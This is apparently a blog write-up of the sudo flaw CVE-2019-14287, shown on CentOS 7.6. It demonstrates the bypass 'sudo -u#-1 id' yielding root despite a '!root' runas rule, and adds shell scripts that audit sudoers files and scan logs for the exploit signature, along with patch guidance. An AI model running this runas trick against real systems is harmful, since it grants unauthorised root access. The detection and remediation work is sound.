Sudo Flaw Permits Restricted Root Runas Access. When sudo is configured to let a user run commands as any other user with the ALL keyword, that user can run commands as root by specifying the runas user ID -1 or 4294967295, even when root is explicitly excluded from the runas list. The PAM session is not run for the command. This vulnerability is assigned CVE-2019-14287 and affects sudo versions prior to 1.8.28. A couple of write-ups already exist; the aim here was to see it in action on CentOS 7.6 with sudo-1.8.23-3.el7.x86_64 (1.8.23).
The Setup
Create a user, user1, and add a sudoers entry that allows user1 to run the id command as any user except root.
/etc/sudoers.d/user1.conf
user1 ALL=(ALL, !root) /usr/bin/id
sudo Tests
As user1, run the following sudo commands.
[user1@centos7 root]$ sudo id
Sorry, user user1 is not allowed to execute '/bin/id' as root on centos7.example.com.
[user1@centos7 root]$ sudo -u#0 id
Sorry, user user1 is not allowed to execute '/bin/id' as root on centos7.example.com.
[user1@centos7 root]$ sudo -u#-1 id
uid=0(root) gid=1017(user1) groups=1017(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user1@centos7 root]$ sudo -u#-1 id -u
0
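Two checks a defender would want after seeing the above, written as an added example that is not part of the original post: an audit of sudoers text for runas lists that exclude root (the `(ALL, !root)` pattern this bug bypasses), and a scan of sudo's syslog lines for the unresolvable runas id. The sudoers fragments and log lines below are constructed samples; the assumption is that sudo logs the requested runas user verbatim in the `USER=` field, so `-u#-1` appears as `USER=#-1`.

```shell
#!/bin/sh
# Constructed sudoers fragments (not from the original post): three entries
# rely on excluding root from the runas list, one does not.
SUDOERS_SAMPLE='user1 ALL=(ALL, !root) /usr/bin/id
user2 ALL=(ALL, !#0) /usr/bin/id
user3 ALL=(ALL) NOPASSWD: /usr/bin/systemctl
user4 ALL=(ALL, !root, !daemon) /usr/bin/ls'

# Constructed syslog lines in the layout sudo uses on CentOS 7. The USER=
# field is assumed to carry the runas user exactly as requested, so the
# unresolvable ids from the post show up as #-1 and #4294967295.
LOG_SAMPLE='Oct 14 10:00:01 centos7 sudo: user1 : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/bin/id
Oct 14 10:00:05 centos7 sudo: user1 : TTY=pts/0 ; PWD=/root ; USER=#-1 ; COMMAND=/bin/id
Oct 14 10:00:09 centos7 sudo: user1 : TTY=pts/0 ; PWD=/root ; USER=#4294967295 ; COMMAND=/bin/id -u
Oct 14 10:00:12 centos7 sudo: user3 : TTY=pts/1 ; PWD=/home/user3 ; USER=root ; COMMAND=/usr/bin/systemctl status sshd'

# Print sudoers lines whose runas list excludes root by name or by uid 0.
# These are the rules sudo < 1.8.28 fails to enforce for runas id -1.
find_root_exclusions() {
    printf '%s\n' "$1" | grep -E '\(.*(!root|!#0).*\)'
}

# Print log lines where the requested runas user was one of the two ids
# that trigger the bug. Anchoring on the full "USER=... ;" token avoids
# false hits on the COMMAND= field.
find_minus_one_runas() {
    printf '%s\n' "$1" | grep -E 'USER=#(-1|4294967295) ;'
}

# Line count of a captured result (0 for an empty string), so callers can
# decide pass/fail without re-parsing the output.
count_lines() {
    if [ -z "$1" ]; then
        echo 0
    else
        printf '%s\n' "$1" | wc -l | tr -d ' '
    fi
}

# Stand-alone run over the constructed samples.
exclusions=$(find_root_exclusions "$SUDOERS_SAMPLE")
hits=$(find_minus_one_runas "$LOG_SAMPLE")
echo "sudoers rules that rely on a root exclusion: $(count_lines "$exclusions")"
printf '%s\n' "$exclusions"
echo "log lines requesting runas id -1 / 4294967295: $(count_lines "$hits")"
printf '%s\n' "$hits"
```

On a real host the same functions take live input, for example `find_root_exclusions "$(cat /etc/sudoers /etc/sudoers.d/*)"` and `find_minus_one_runas "$(grep sudo: /var/log/secure)"`; any hit in the first set is a rule to rewrite until the fixed sudo is installed, and any hit in the second is worth an incident ticket regardless of whether the command succeeded.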
Resolution
Update sudo to 1.8.28. There is no RPM available at the time of this writing; the latest packaged version falls well short of 1.8.28. Alternatively, build from source. This has not been completely tested, so create a snapshot of the VM before proceeding.
wget ftp://ftp.sudo.ws/pub/sudo/sudo-1.8.28.tar.gz
tar xzvf sudo-1.8.28.tar.gz
cd sudo-1.8.28
./configure
make
make install
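After `make install` the fixed binary lands under /usr/local while the distribution package stays in place, so it is worth confirming which sudo is first on PATH and whether its version is at or past 1.8.28. The following is an added example, not part of the original post: it parses the first line of `sudo -V` ("Sudo version X.Y.Z") and compares major.minor.micro against 1.8.28, ignoring "pN" patch-level suffixes.

```shell
#!/bin/sh
# Extract "1.8.28" from `sudo -V` output whose first line reads
# "Sudo version 1.8.28".
parse_sudo_version() {
    printf '%s\n' "$1" | sed -n '1s/^Sudo version //p'
}

# Exit status 0 when major.minor.micro >= 1.8.28 (first release with the
# CVE-2019-14287 fix), 1 otherwise. Suffixes such as "1.8.23p2" are
# dropped before comparing; the fix arrived with a micro bump.
sudo_version_is_fixed() {
    ver=$1
    [ -z "$ver" ] && return 1
    major=${ver%%.*}
    rest=${ver#*.}
    case $rest in
        *.*) minor=${rest%%.*}; micro=${rest#*.} ;;
        *)   minor=$rest;       micro=0 ;;
    esac
    micro=${micro%%[!0-9]*}      # strip "p2"-style patch suffix
    [ -z "$micro" ] && micro=0
    if [ "$major" -gt 1 ]; then return 0; fi
    if [ "$major" -lt 1 ]; then return 1; fi
    if [ "$minor" -gt 8 ]; then return 0; fi
    if [ "$minor" -lt 8 ]; then return 1; fi
    [ "$micro" -ge 28 ]
}

# Stand-alone use: report on whichever sudo is first on PATH, if any.
if command -v sudo >/dev/null 2>&1; then
    installed=$(parse_sudo_version "$(sudo -V 2>/dev/null)")
    if sudo_version_is_fixed "$installed"; then
        echo "$(command -v sudo) is $installed: fixed for CVE-2019-14287"
    else
        echo "$(command -v sudo) is ${installed:-unknown}: still affected, update to 1.8.28 or later"
    fi
fi
```

If the report still names /usr/bin/sudo at 1.8.23 after the source build, the shell is resolving the packaged binary ahead of /usr/local/bin, and the PATH order (or the packaged binary) needs attention before the fix is actually in effect for users.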
Source(s)
- https://www.sudo.ws/alerts/minus_1_uid.html
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.sudo.ws/install.html